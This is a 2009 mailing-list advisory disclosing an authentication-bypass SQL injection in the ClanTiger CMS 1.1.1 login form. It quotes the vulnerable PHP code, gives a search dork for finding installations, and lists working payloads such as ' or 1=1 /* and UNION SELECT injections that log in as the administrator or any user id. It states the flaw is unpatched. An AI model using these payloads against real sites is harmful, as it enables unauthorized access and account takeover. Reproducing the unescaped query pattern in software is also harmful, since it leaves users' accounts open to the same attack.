CLAN TIGER CMS 1.1.1 (AUTH BYPASS) SQL-INJECTION

y3nh4ck3r Mon, 20 Apr 2009 09:39:14 -0700

-----------------------------------------------------------

 CLAN TIGER CMS AUTH BYPASS LOGIN FORM (SQL INJECTION)


-----------------------------------------------------------



 CMS INFORMATION:                               



-->WEB: http://www.clantiger.com

-->DOWNLOAD: http://www.clantiger.com/download-clan-cms

-->DEMO: http://www.demo.clantiger.com/

-->CATEGORY: CMS / Portals

-->DESCRIPTION: ClanTiger is a content management system specifically designed 
for gaiming

                clans...



 CMS VULNERABILITY:

             

-->TESTED ON: firefox 2.0.0.20 and IE 7.0.5730 (Default)

-->DORK: "Powered by ClanTiger"

-->CATEGORY: SQL INJECTION/ AUTH BYPASS

-->AFFECT VERSION: LAST = 1.1.1 (1.1 too)

-->Discovered Bug date: 2009-04-11

-->Reported Bug date: 2009-04-11

-->Fixed bug date: Not fixed

-->Info patch (????): Not fixed

-->Author: YEnH4ckEr

-->mail: y3nh4ck3r[at]gmail[dot]com

-->WEB/BLOG: N/A

-->COMMENT: A mi novia Marijose...hermano,cuñada, padres (y amigos xD) por su 
apoyo.



---------------

BUG FILE:

---------------



Path --> [HOME_PATH]/module/login.php



It contents:



        function authenticate()

        {

                

                $authentication = 
$this->access->authenticate($_POST['email'],$_POST['password'],(bool) 
$_POST['stayLogged']);

                if($authentication === true)

                {

                        header('Location: index.php?info=hasLoggedIn');

                        exit;

                }



                // we couldn't log in

                $this->errorMessages[] = $authentication;

                $this->main();          

                

        }



Path --> [HOME_PATH]/function/class.accesscontrol.php



It contents:



public function authenticate($email,$password,$stayAuthed=false)

        {

                

                if($stayAuthed) $logintime = time() + (3600*24*356*3);

                else $logintime = time() + 3600;

                

                // attempt to get the user from the database

                include ROOTPATH . 'base/class.user.php';

                $user = new User;

                $user->email = $email;

                $user->password = md5($password);

                $user->getBy(array('email','password'));

                ...

                                

        }       



----------------

CONDITIONS:

----------------



**gpc_magic_quotes=off



--------------------------------------

PROOF OF CONCEPT (SQL INJECTION):

--------------------------------------



[HOME_PATH]/index.php?module=login



login form:



e-mail value: something' [SQL]

password value: something //it is not used



-------------

EXAMPLE:

-------------



login post form:



e-mail value: something' or 1=1 /* --> we are admin!

e-mail value: something' or 1   #  --> we are admin!



Note: Now, we need DB_PREFIX (default: "", others: db_, clan_, etc)



e-mail value: something' AND 0 UNION ALL SELECT * FROM members WHERE id=1 
/*-->admin (if id=1)!

e-mail value: something' AND 0 UNION ALL SELECT * FROM members WHERE id=12 /* 
-->we are user id=12! 



*******************************************************************

 GREETZ TO: Str0ke, JosS and all spanish Hack3Rs community!

*******************************************************************

CLAN TIGER CMS 1.1.1 (AUTH BYPASS) SQL-INJECTION

Reply via email to